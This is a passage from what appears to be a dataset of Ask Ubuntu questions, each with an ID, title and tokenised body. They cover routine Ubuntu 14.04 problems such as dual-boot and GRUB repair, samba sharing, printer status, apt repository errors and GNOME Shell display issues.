shell and it had no effect the same with my bash_profile i have commented out and it had no effect . bash_profile export path= '' $ home/.pyenv/bin : $ path '' eval `` $ ( pyenv init - ) '' eval `` $ ( pyenv virtualenv-init - ) ''
483517	gnome shell not showing dropbox on top panel	today i'am installing gnome shell with this commands : sudo apt-get install gnome-shell first everything was fine , but i think there is less . a few minutes later i realized that no one dropbox icons on gnome panel : how do i get dropbox icons on gnome shell ? edit i already installed libappindicator1 and i can confirm dropbox is running with ps -e | grep dropbox commands in terminal : firststrike @ 13.10 : ~ $ ps -e | grep dropbox 2738 ? 00:00:04 dropbox firststrike @ 13.10 : ~ $ and i aware that there dropbox in message tray : edit 2 finally i fix it with topicons : but when i clicked on the icon , is just opened dropbox folder not appear drop down menu like in unity .
483520	keyboard typing problem ubuntu 14.04	i recently installed ubuntu 14.04 . i am facing a problem while typing . whenever i start typing within few moment my keyboard cursor starts blinking very fast and multiple letter are typed in a single stroke . it keeps happening in after few minutes again and again . any help regarding this issue will be greatly appreciated . thanks
483524	virtualbox stops working during system restart at ubuntu install	the installation of ubuntu via virtualbox all works fine until a last dialog box appears `` succesfully installed , please reboot to start working on ubuntu '' and as soon as i click on the restart , virtulbox stops working . tried twice but did n't help .
483525	problem of loading ubuntu 14.04 32 bit alongside windows 8 pro 32 bit	i had windows 7 64 bit installed in my laptop and i have installed ubuntu 13.10 that time alongside windows 7 . after that i have upgraded my ubuntu as 14.04 32 bit and it was working properly . 2/3 days ago i needed to install windows again as it was affected by virus . this time i installed windows 8 pro 32 bit in my hard disk . but after installing the windows 8 , i ca n't see the dual boot menu from which i can go for ubuntu 14.04 which i had earlier . in this case how can i recover my ubuntu along with the dual boot menu to use both ubuntu 14.04 lts 32 bit & windows 8 pro 32 bit together without reinstalling the ubuntu .
483526	rdp from 14.04 to 14.04 failing to connect	i am not able to connect to a 14.04 system from another 14.04 system using vinagre remote desktop viewer when not on the same network . i am also not able to connect to this computer when the target is booted from a 12.04 live cd . i can connect to a third computer using the same lan cable and booted from the same 12.04 live cd . i am able to ping the ip address that is revealed by googling `` what is my ip '' i am able to connect by clicking find when connecting from vinagre while using the same network . ( control on wifi from same modem as target on ethernet ) i have tried turning off encryption with dconf org > gnome > desktop > remote-access > require-encryption=false i have tried installing x11vnc . when other computers work i click connect and am asked for a password . when this computer fails to connect , i do not get the password request and the screen remains black until it times out and says `` connection closed connection to xxx.xx.xxx.xxx was closed . '' i would be very grateful for any suggestions .
483529	would like to use different passwords for initial login and sudo for encrypted home folder	i just encrypted my home directory using ecryptfs and the instructions from how to encrypt ubuntu home folder after installation . in order to really benefit from the encryption , however , i needed to change to a stronger and longer password for login . typing in a long password once at login does n't bother me , but it does get annoying to have to type in such a long password every time i use sudo . how can i set my account to use two passwords : a strong long password for login and a weaker shorter password for sudo ( with an ecryptfs encrypted home folder ) ?
483530	u 14.04 samba problems : ubuntu to windows and windows to ubuntu	i just tried sharing a folder on a w7 machine and accessing it from u65 14.04 as smb : //ipaddress and was unable to get on - it challenges for a user name , workgroup , and password . likewise , i tried right-clicking a folder in nautilus and enabling sharing , but the win7 machine gave the `` ..you do not have permission.. '' error . i spent several hours yesterday trying to make this work either way without any success . the online documentation / suggestions / guides do not appear to work for u14.04 + win7 at all . u12.x & 13.x had no such difficulties . if anyone has succeeded in ubuntu/win7 samba sharing please post - nothing seems to work . ( fresh install of u14.04 , not an upgrade )
483531	update windows 8 broke my grub	any update w8 broke my grub . normally , the boot-repair all repaired , now can not cope . details : http : //paste.ubuntu.com/7612713/ can you advise something ?
483532	how to set up konversation in kde plasma ?	i installed kubuntu-desktop and i want to set up the kde app for chat which is konversation . i got no idea how to do so . can anyone tell me how do i do it ? thanx
483538	printer status is not updating , so it wo n't print after update to ubuntu 14.04	ubuntu 14.04 64bit ( upgraded from 12.04 ) , samsung ml-2015 ( ml-2010 ) . when i first send printing job to the printer , it prints okay , but then printer status still says `` sending data to printer '' , while printer has already printed page and is available for new jobs . or status might read `` wainting for printer to become available '' , while it is available . it uses cups stock ppd driver . there are two of them , i 've tried both , no luck . the only way you can make printer status update is either to wait around ten minutes , or to change usb port printer connected to . it seems to be somehow related to apparomor , as at times when printer is being used i get these lines in /var/log/syslog : jun 15 13:24:55 ... kernel : [ 827.574712 ] type=1400 audit ( 1402824295.658:36 ) : apparmor= '' denied '' operation= '' signal '' profile= '' /usr/sbin/cupsd '' pid=1055 comm= '' cupsd '' requested_mask= '' send '' denied_mask= '' send '' signal=term peer= '' unconfined '' jun 15 13:24:55 ... kernel : [ 827.574740 ] type=1400 audit ( 1402824295.658:37 ) : apparmor= '' denied '' operation= '' signal '' profile= '' /usr/sbin/cupsd '' pid=1055 comm= '' cupsd '' requested_mask= '' send '' denied_mask= '' send '' signal=term peer= '' unconfined '' jun 15 13:24:55 ... kernel : [ 827.574758 ] type=1400 audit ( 1402824295.658:38 ) : apparmor= '' denied '' operation= '' signal '' profile= '' /usr/sbin/cupsd '' pid=1055 comm= '' cupsd '' requested_mask= '' send '' denied_mask= '' send '' signal=term peer= '' unconfined '' also , i 've tried to monitor logs and there is some interesting activity as you send new job to the printer : jun 15 14:34:37 ... kernel : [ 5014.349170 ] usb 2-1.2.3 : reset full-speed usb device number 31 using ehci-pci jun 15 14:34:37 ... kernel : [ 5014.443009 ] usb 2-1.2.3 : usb disconnect , device number 31 jun 15 14:34:37 ... kernel : [ 5014.443353 ] usblp0 : removed jun 15 14:34:37 ... udev-configure-printer : remove /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2.3 jun 15 14:34:37 ... kernel : [ 5014.517355 ] usb 2-1.2.3 : new full-speed usb device number 32 using ehci-pci jun 15 14:34:37 ... kernel : [ 5014.611263 ] usb 2-1.2.3 : new usb device found , idvendor=04e8 , idproduct=326c jun 15 14:34:37 ... kernel : [ 5014.611274 ] usb 2-1.2.3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 jun 15 14:34:37 ... kernel : [ 5014.611281 ] usb 2-1.2.3 : product : samsung ml-2010 jun 15 14:34:37 ... kernel : [ 5014.611286 ] usb 2-1.2.3 : manufacturer : samsung jun 15 14:34:37 ... kernel : [ 5014.611291 ] usb 2-1.2.3 : serialnumber : 3d66bkcp824986l . jun 15 14:34:37 ... kernel : [ 5014.612787 ] usblp 2-1.2.3:1.0 : usblp0 : usb bidirectional printer dev 32 if 0 alt 0 proto 2 vid 0x04e8 pid 0x326c jun 15 14:34:38 ... udev-configure-printer : add /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2.3/2-1.2.3:1.0 jun 15 14:34:38 ... udev-configure-printer : device devpath is /devices/pci0000:00/0000:00:1d.0/usb2/2-1/2-1.2/2-1.2.3/2-1.2.3:1.0 jun 15 14:34:38 ... udev-configure-printer : device already handled this repeats every 5 seconds . that is , every five seconds some process resets printer usb device via ehci-pci and then it disappears and appears again .
483539	black screen booting installer ( windows or ubuntu 13.10 ) on acer aspire e1-510	i have an acer aspire e1-510 laptop with pre-installed a linpus linux distribution . i want to install win 7 on it . i 'm sure that what i 'm doing is the correct/usual way of how to install windows from a linux distribution . my problem is that after the very first black screen with message `` windows is loading files ... '' when the `` starting windows microsoft corporation '' message appears together with the sign of windows , the whole laptop freezes . as i said my laptop is brand new . this is the first format/installation i 'm trying to achieve . so , i thought that maybe there are pre-istalled special settings preventing me from installing another os.i burned a gparted live cd and tried to delete the old partitions , created only one partition and formatted it to ntfs . i did it successfully and i have checked the hdd ( with applications like fdisk , testdisk , and the gui of gparted ) . the mbr is ok and the primary partition has been created without any errors or bad sectors on my disk . i have also tried to install ubuntu 13.10 from a live cd and the result was the same . my screen freezes but this time without displaying anything . when i checked it again with the gparted i saw that the linux partitions were created again . so , i deleted them again with gparted and after the second try with ubuntu cd the partitions were back again . i have done the same check with windows and i verified that from linux partitions ( swap partition , /dev/sda1 etc ... ) windows partitioned my hdd into ntfs but the installation never ended because my laptop froze . from all the above according to my experience it could not be an hdd error or an error in the formatting/partitioning process , but it has to do either with the graphic card or with the drivers of the card . my screen works fine when i insert the gparted live cd . i can do anything from the gparted gui from partitioning the hdd , opening a terminal , configuring my network , opening a web browser , anything one can do with a live cd . is n't it very strange ? this makes me believe that if the card did n't work for any reason or if the drivers were old or missing , then it would n't work with gparted either . do you have any idea ... tip ... mayday link/suggestion on how to investigate any further this issue ? it 's the first time i 'm facing something like that thank you for your answers
483540	porting app created using ubuntu sdk onto an embedded linux board	i have created an app using the ubuntu sdk , which i want to port onto an embedded linux based device . the app uses qml and c++ . how should i package the app for deployment taking into account the dependencies ?
483547	image hex editors with visual output ?	i am wondering if there are any visual hex editors out there , much like bless , but has a visual output for image files so you know what sections you 're looking at in the file when editing the hex values . i 've been looking for something where i see hex data values in one side , and then another section to show a preview of the image you are editing , and highlighting over that you 're about to edit or have selected when viewing to map out where you currently are in the file before you edit the hex data values . i 'm asking this because it 's difficult to know what section of the image when editing is n't the information section which tells you what kind of image file it is , blah blah stuff . because in the image file you have the data section which can tell whether if it 's a jpeg or png image for example , then the section below where the actual image hex values are located . it 's a bit difficult when editing blind and not knowing where to edit without damaging the information data value in the file itself and to only edit the actual image section itself . i could be editing with bless for example , and have the image open in a separate image viewer , and edit the hex values , but that would require me to constantly save to file every time to see which parts i have edited to see the resulting effect of what i 've edited . i just need a sort of real-time image hex editor which shows me what i 'm editing , and how the end result will be if i change those hex values before i save it to the file to apply the changes .
483549	when will launchpad.net be working ?	launchpad.net has been up and down like a yo-yo for the last two days , making my weekends migration of 40 machines to 14.04 impossible . see http : //www.isitdownrightnow.com/launchpad.net.html anybody have an idea when it will be available consistently ?
483551	is it possible to do only the download part of apt-get/aptitude full-upgrade ?	when i go to internet cafe , i 'd like to take that opportunity to upgrade the system . sometimes though there is not electrical sockets in the cafe . to conserve batteries i 'd like to be able to only do the `` download '' part of the upgrade process , and apply the new packages later , at home . i know that i can just interrupt the apt-get dist-upgrade process just after it downloads the packages . i want to have a hands-free solution , that i can use in my custom download-all-upgrades.sh script . it is possible to just download the package with aptitude , but it works only when i know the package name . it does n't work with upgrade .
483552	gradle finds wrong java_home even though it 's correctly set ubuntu 13.10	i have just installed gradle from the terminal sudo apt-get install gradle after finishing am trying to run the command gradle -v i get the following error error : java_home is set to an invalid directory : /usr/lib/jvm/java-7-oracle/jre/bin/java please set the java_home variable in your environment to match the location of your java installation . when i run echo $ java_home i get /usr/lib/jvm/java-7-oracle/jre/bin/java so that 's the correct path i edited my bashrc file added the following lines export java_home=/usr/lib/jvm/java-7-oracle/jre/bin/java export java_home i still get the same error when i run gradle -v
483554	how list of running applications by command ?	i want to list only running application like : firefox , gedit , nautilus etc . by command-line . note : - i do n't want to list all running process . but only list application which is running ( say manually launched guis ) .
483555	problem with 5.1 ac-3 through alsa , pulseaudio on spdif , ubuntu 14.04	i have ubuntu 14.04 installed ( i386 architecture ) on zotac zbox-id18 . i am trying to output digital surround audio through digital spdif output , i understand that the default spdif output is on pcm format which is stereo only ( not 5.1 surround ) . i did install the ac3 plugin using the below as a reference , however even after selecting `` digital 5.1 output '' profile , i do n't get any audio output at all . https : //help.ubuntu.com/community/digitalac-3pulseaudio i tried forcing this profile from default.pa and from pavucontrol but still no luck : ( also tried running aplay -d a52:0 but not getting any output . in some random cases i was able to output digital surround by playing test videos but it happened only few cases and could n't relate this cases with any other events or config changes , it was pure random .
483560	how to move icons on kubuntu ?	i 'm new to linux world . recently i 've installed kubuntu and i do n't know how to move icons on the desktop . when i drag an icon from applications ( start menu ) and drop it , i ca n't move it anymore . for example , if i drop it in the middle of desktop , i ca n't drag it to left corner . seems like icons are locked . what should i do ?
483564	locked out of ubuntu 14.04 after failed restore	i made a deja dup backup from ubuntu 14.04 and tried to restore it to see if it works . there was a file in /root/.config/pulse/something that could not be restored . even though rest of the restore worked fine i ca n't seem to login to my account anymore . i have tried both root and useraccount . after i enter my password mouse disappears and for sometime it doesnt show anything . subsequently it goes back to the login screen . i am dual booting on this machine that means files are accessible . i was wondering if there is a solution to it ? i have never been able to successfully backup ubuntu : s
483565	error occured when apt-get update run	i tried to run sudo apt-get update on ubuntu gnome 14.04 . and here is result : err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease err http : //ppa.launchpad.net trusty inrelease w : failed to fetch http : //ppa.launchpad.net/fossfreedom/packagefixes/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/gilir/lubuntu/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/kilian/f.lux/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/shutter/ppa/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/webupd8team/java/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu/dists/trusty/inrelease w : failed to fetch http : //ppa.launchpad.net/cassou/emacs/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/chris-lea/node.js/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/diesch/testing/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/fossfreedom/packagefixes/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/gilir/lubuntu/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/kilian/f.lux/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/shutter/ppa/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/webupd8team/java/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu/dists/trusty/release.gpg unable to connect to ppa.launchpad.net : http : w : failed to fetch http : //archive.canonical.com/dists/trusty/release.gpg can not initiate the connection to archive.canonical.com:80 ( 2001:67c:1360:8c01 : :1b ) . - connect ( 101 : network is unreachable ) [ ip : 2001:67c:1360:8c01 : :1b 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . here is output after run find /etc/apt -name '*.list ' -exec bash -c 'echo -e `` \n $ 1\n '' ; cat -n `` $ 1 '' ' _ ' { } ' \ ; : /etc/apt/sources_20140408-22:53:08/sources.list.d/webupd8team-java-trusty.list 1 deb http : //ppa.launchpad.net/webupd8team/java/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list.d/opera.list 1 # this file makes sure that opera browser is kept up-to-date 2 # as part of regular system upgrades 3 4 deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) 5 6 7 /etc/apt/sources_20140408-22:53:08/sources.list.d/chris-lea-node_js-trusty.list 1 deb http : //ppa.launchpad.net/chris-lea/node.js/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/chris-lea/node.js/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list.d/shutter-ppa-trusty.list 1 deb http : //ppa.launchpad.net/shutter/ppa/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/shutter/ppa/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list.d/tualatrix-ppa-trusty.list 1 deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list.d/webupd8team-sublime-text-3-trusty.list 1 deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list.d/cassou-emacs-trusty.list 1 deb http : //ppa.launchpad.net/cassou/emacs/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/cassou/emacs/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list.d/gilir-lubuntu-trusty.list 1 deb http : //ppa.launchpad.net/gilir/lubuntu/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/gilir/lubuntu/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_intellij-idea-ce_ubuntu.list 1 deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/intellij-idea-ce/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources_20140408-22:53:08/sources.list.d/google-chrome.list 1 # # # this file is automatically configured # # # 2 # you may comment out this entry , but any other modifications may be lost . 3 deb http : //dl.google.com/linux/chrome/deb/ stable main /etc/apt/sources_20140408-22:53:08/sources.list.d/diesch-testing-trusty.list 1 deb http : //ppa.launchpad.net/diesch/testing/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/diesch/testing/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list.d/fossfreedom-packagefixes-trusty.list 1 deb http : //ppa.launchpad.net/fossfreedom/packagefixes/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/fossfreedom/packagefixes/ubuntu trusty main /etc/apt/sources_20140408-22:53:08/sources.list 1 # deb cdrom : [ ubuntu-gnome 14.04 lts _trusty tahr_ - beta amd64 ( 20140326.1 ) ] / trusty main multiverse restricted universe 2 3 # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to 4 # newer versions of the distribution . 5 deb http : //ua.archive.ubuntu.com/ubuntu/ trusty main restricted 6 deb-src http : //ua.archive.ubuntu.com/ubuntu/ trusty main restricted 7 8 # # major bug fix updates produced after the final release of the 9 # # distribution . 10 deb http : //ua.archive.ubuntu.com/ubuntu/ trusty-updates main restricted 11 deb-src http : //ua.archive.ubuntu.com/ubuntu/ trusty-updates main restricted 12 13 # # n.b . software from this repository is entirely unsupported by the ubuntu 14 # # team . also , please note that software in universe will not receive any 15 # # review or updates from the ubuntu security team . 23 # # your rights to use the software . also , please note that software in 24 # # multiverse will not receive any review or updates from the ubuntu 25 # # security team . 26 deb http : //ua.archive.ubuntu.com/ubuntu/ trusty multiverse 27 deb-src http : //ua.archive.ubuntu.com/ubuntu/ trusty multiverse 28 deb http : //ua.archive.ubuntu.com/ubuntu/ trusty-updates multiverse 29 deb-src http : //ua.archive.ubuntu.com/ubuntu/ trusty-updates multiverse 30 31 # # n.b . software from this repository may not have been tested as 32 # # extensively as that contained in the main release , although it includes 33 # # newer versions of some applications which may provide useful features . 34 # # also , please note that software in backports will not receive any review 35 # # or updates from the ubuntu security team . 36 deb http : //ua.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse 37 deb-src http : //ua.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse 38 39 deb http : //security.ubuntu.com/ubuntu trusty-security main restricted 40 deb-src http : //security.ubuntu.com/ubuntu trusty-security main restricted 41 deb http : //security.ubuntu.com/ubuntu trusty-security universe 42 deb-src http : //security.ubuntu.com/ubuntu trusty-security universe 43 deb http : //security.ubuntu.com/ubuntu trusty-security multiverse 44 deb-src http : //security.ubuntu.com/ubuntu trusty-security multiverse 45 46 # # uncomment the following two lines to add software from canonical's 47 # # 'partner ' repository . 48 # # this software is not part of ubuntu , but is offered by canonical and the 49 # # respective vendors as a service to ubuntu users . 50 # deb http : //archive.canonical.com/ubuntu trusty partner 51 # deb-src http : //archive.canonical.com/ubuntu trusty partner 52 53 # # this software is not part of ubuntu , but is offered by third-party 54 # # developers who want to ship their latest software . 55 deb http : //extras.ubuntu.com/ubuntu trusty main 56 deb http : //archive.canonical.com/ trusty partner 57 # deb-src http : //archive.canonical.com/ trusty partner 58 deb-src http : //extras.ubuntu.com/ubuntu trusty main /etc/apt/sources.list.d/webupd8team-java-trusty.list 1 deb http : //ppa.launchpad.net/webupd8team/java/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu trusty main /etc/apt/sources.list.d/opera.list 1 # this file makes sure that opera browser is kept up-to-date 2 # as part of regular system upgrades 3 4 deb http : //deb.opera.com/opera/ stable non-free # opera browser ( final releases ) 5 6 7 /etc/apt/sources.list.d/typesafe-apt.list 1 # typesafe repository . 2 deb http : //apt.typesafe.com/ unicorn main # typesafe `` unicorn '' releases . /etc/apt/sources.list.d/chris-lea-node_js-trusty.list 1 deb http : //ppa.launchpad.net/chris-lea/node.js/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/chris-lea/node.js/ubuntu trusty main 3 # deb-src http : //ppa.launchpad.net/chris-lea/node.js/ubuntu trusty main /etc/apt/sources.list.d/kilian-f_lux-trusty.list 1 deb http : //ppa.launchpad.net/kilian/f.lux/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/kilian/f.lux/ubuntu trusty main /etc/apt/sources.list.d/ubuntu-on-rails-ppa-trusty.list 1 deb http : //ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/ubuntu-on-rails/ppa/ubuntu trusty main /etc/apt/sources.list.d/shutter-ppa-trusty.list 1 deb http : //ppa.launchpad.net/shutter/ppa/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/shutter/ppa/ubuntu trusty main /etc/apt/sources.list.d/tualatrix-ppa-trusty.list 1 # deb http : //ppa.launchpad.net/tualatrix/ppa/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/tualatrix/ppa/ubuntu trusty main /etc/apt/sources.list.d/webupd8team-sublime-text-3-trusty.list 1 deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu trusty main /etc/apt/sources.list.d/cassou-emacs-trusty.list 1 deb http : //ppa.launchpad.net/cassou/emacs/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/cassou/emacs/ubuntu trusty main /etc/apt/sources.list.d/gilir-lubuntu-trusty.list 1 deb http : //ppa.launchpad.net/gilir/lubuntu/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/gilir/lubuntu/ubuntu trusty main /etc/apt/sources.list.d/private-ppa.launchpad.net_commercial-ppa-uploaders_intellij-idea-ce_ubuntu.list 1 deb https : //private-ppa.launchpad.net/commercial-ppa-uploaders/intellij-idea-ce/ubuntu precise main # added by software-center ; credentials stored in /etc/apt/auth.conf /etc/apt/sources.list.d/google-chrome.list 1 # # # this file is automatically configured # # # 2 # you may comment out this entry , but any other modifications may be lost . 3 deb http : //dl.google.com/linux/chrome/deb/ stable main /etc/apt/sources.list.d/diesch-testing-trusty.list 1 deb http : //ppa.launchpad.net/diesch/testing/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/diesch/testing/ubuntu trusty main /etc/apt/sources.list.d/fossfreedom-packagefixes-trusty.list 1 deb http : //ppa.launchpad.net/fossfreedom/packagefixes/ubuntu trusty main 2 # deb-src http : //ppa.launchpad.net/fossfreedom/packagefixes/ubuntu trusty main /etc/apt/sources.list.d/mongo.list 1 # # 10gen package location 2 3 deb http : //downloads-distro.mongodb.org/repo/ubuntu-upstart dist 10gen /etc/apt/sources.list 20 21 # # n.b . software from this repository is entirely unsupported by the ubuntu 22 # # team , and may not be under a free licence . please satisfy yourself as to 23 # # your rights to use the software . also , please note that software in 24 # # multiverse will not receive any review or updates from the ubuntu 25 # # security team . 26 deb http : //ua.archive.ubuntu.com/ubuntu/ trusty multiverse 27 deb-src http : //ua.archive.ubuntu.com/ubuntu/ trusty multiverse 28 deb http : //ua.archive.ubuntu.com/ubuntu/ trusty-updates multiverse 29 deb-src http : //ua.archive.ubuntu.com/ubuntu/ trusty-updates multiverse 30 31 # # n.b . software from this repository may not have been tested as 32 # # extensively as that contained in the main release , although it includes 33 # # newer versions of some applications which may provide useful features . 34 # # also , please note that software in backports will not receive any review 35 # # or updates from the ubuntu security team . 36 deb http : //ua.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse 37 deb-src http : //ua.archive.ubuntu.com/ubuntu/ trusty-backports main restricted universe multiverse 38 39 deb http : //security.ubuntu.com/ubuntu trusty-security main restricted 40 deb-src http : //security.ubuntu.com/ubuntu trusty-security main restricted 41 deb http : //security.ubuntu.com/ubuntu trusty-security universe 42 deb-src http : //security.ubuntu.com/ubuntu trusty-security universe 43 deb http : //security.ubuntu.com/ubuntu trusty-security multiverse 44 deb-src http : //security.ubuntu.com/ubuntu trusty-security multiverse 45 46 # # uncomment the following two lines to add software from canonical's 47 # # 'partner ' repository . 48 # # this software is not part of ubuntu , but is offered by canonical and the 49 # # respective vendors as a service to ubuntu users . 50 # deb http : //archive.canonical.com/ubuntu trusty partner 51 # deb-src http : //archive.canonical.com/ubuntu trusty partner 52 53 # # this software is not part of ubuntu , but is offered by third-party 54 # # developers who want to ship their latest software . 55 deb http : //extras.ubuntu.com/ubuntu trusty main 56 deb http : //archive.canonical.com/ trusty partner 57 # deb-src http : //archive.canonical.com/ trusty partner 58 deb-src http : //extras.ubuntu.com/ubuntu trusty main how to solve this trouble ?
483566	ubuntu only runs when on nomodeset	i do n't know what nomodeset does but when i try running ubuntu ( just as a test before installing ) my tv which i use as a monitor will only pick it up in nomodeset but it also seems a bit slow . i really want ubuntu on my computer but i want it at full speed any ideas on what i can do ? i read lowering the refresh rate could work but how could i do this ? is it possible to do before actually installing ?
483569	gnome shell session not showing anything except wallpaper only in ubuntu 14.04 ( compaq 6910p )	**gnome shell session not showing anything except wallpaper only in ubuntu 14.04 ( compaq 6910p ) i install gnome 3 session ( offical ) and i used gnome shell session but not showing or not loaded components of gnome shell except wallpaper only shell wants to try out , but that does not show what broke some such thing , except that the background image only . show wallpaper only . **
483570	intel graphics control panel alternative for ubuntu ?	coming from a windows 7 on a laptop with an integrated graphics card ( intel hd 3000 i think ) as well as an nvidia gt540m , i was accustomed to being able to change things like saturation and gamma of either my laptop screen or my two dell monitors ( one is on vga , one is on hdmi ) from the intel graphics control panel . one of my two dell s2340l monitors ( the one that was on hdmi ) was a lot less saturated than the one on vga , which i solved by changing the color range of the hdmi one to full and checking the ycbcr checkbox for that one in the intel graphics control panel . however , in ubuntu , i can not seem to find a program where one can adjust settings like saturation and color range for monitors . i have tried : gnome color manager ( the one in ubuntu settings . i do not have any calibration hardware ) the nvidia settings app ( this program does not have any color settings ) driconf ( i do n't even know what this one does but i was desperate ) and i still have not found what i am looking for . so the big question is : is there any simple screen color-management program for our beloved ubuntu ? thank you .
483571	debconf : unable to initialize frontend:	i 'm trying to ( unsuccessully ) correct the timezone on my system : root @ 102c5d7bfc0d : / # dpkg-reconfigure tzdata debconf : unable to initialize frontend : debconf : ( ca n't locate debconf/frontend/.pm in @ inc ( you may need to install the debconf : :frontend : : module ) ( @ inc contains : /etc/perl /usr/local/lib/perl/5.18.2 /usr/local/share/perl/5.18.2 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.18 /usr/share/perl/5.18 /usr/local/lib/site_perl . ) at ( eval 34 ) line 2 . ) debconf : falling back to frontend : noninteractive current default time zone : 'etc/utc' local time is now : sun jun 15 10:15:52 utc 2014 . universal time is now : sun jun 15 10:15:52 utc 2014 . how can i get dpkg-reconfigure to interactively ask me for my time zone ?
483574	how to boot ubuntu after installing windows using bootcamp	i have had the need to create a working ubuntu 64-bit and windows 7 pro 64-bit dual booting system of late and decided my macbook pro 8.2 15 '' . i had previously removed the mac os x from it as it was having issues so i formatted the whole hd and had windows 7 running on it without troubles ( bootcamp 4 , 5 , 5.1 ) . i ended up making a mistake and wiping everything during the installation of the ubuntu partition ( after shrinking the windows one and partitioning it ... i did n't realize that the `` erase and install ubuntu '' toggle performed the erase immediately ! ) after installing successfully ubuntu 14.04 lts 64-bit i installed windows 7 in the remaining unpartitioned space . once done so upon boot the computer boots only in w7 and the startup manager accessed from holding the alt / option key upon booting only recognizes the presence of one hard drive and not the various bootable partition . when clicked it will simply boot in windows . now i understand this is because windows does not recognize ext4 and that i should boot in the linux ( grub ? ) partition as it can deal with both ext4 and ntfs , however the startup manager also does n't recognize the two boot partitions which means i am stuck booting in windows 7 at this moment . this guides states i would need to get ubuntu to efi-boot using refind which would be installed through the mac partition , though the article says it was a necessary thing for 32-bit ; is it still for 64-bit as it was running great ? what would you recommend doing to achieve the dual boot ? should i install a temp version of osx to follow the guide ? these were the partitions i made when installing ubuntu , do i need other ones ? a reserved for bios 1 mb swap 6 gb / 100 gb ext4 /media/shared 30 gb fat32 ( there was no ntfs in the list strangely enough ) the rest was left unpartitioned i did n't make a /home partition . the installation went perfectly for ubuntu . it started up wonderfully and working great . i proceeded to install windows and had to create the windows partition in the shared partition by extending it to 300 gb because it would n't allow me to create one in the remaining free allocated space ( commands grayed out )
483578	what to choose as application to launch brightness-controller ?	i 'm new in *ubuntu . i 'm using lubuntu 14.04 . when i 'm trying to download brightness controller it is saying this link needs to be open with an application . which application to choose ? actually i 'm not getting brightness controller in lubuntu software center . that 's why i 've to download it like this . is there any way ?
